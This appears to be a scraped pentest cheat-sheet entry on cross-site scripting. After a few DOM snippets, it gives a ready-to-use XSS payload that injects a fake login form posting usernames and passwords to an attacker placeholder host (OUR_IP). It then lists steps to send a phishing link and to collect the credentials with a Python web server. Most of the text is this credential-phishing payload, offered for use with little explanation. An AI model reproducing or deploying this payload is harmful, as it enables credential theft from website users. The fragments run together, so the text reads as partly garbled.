discovery
XSS attacks
document.body.style.background = 'black'
document.body.background
document.title
DOM.innerHTML# Create a fake login page and trigger victim to login In.
document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();Send crafted phishing link to user
Set up python http.server to receive credentialsLast updated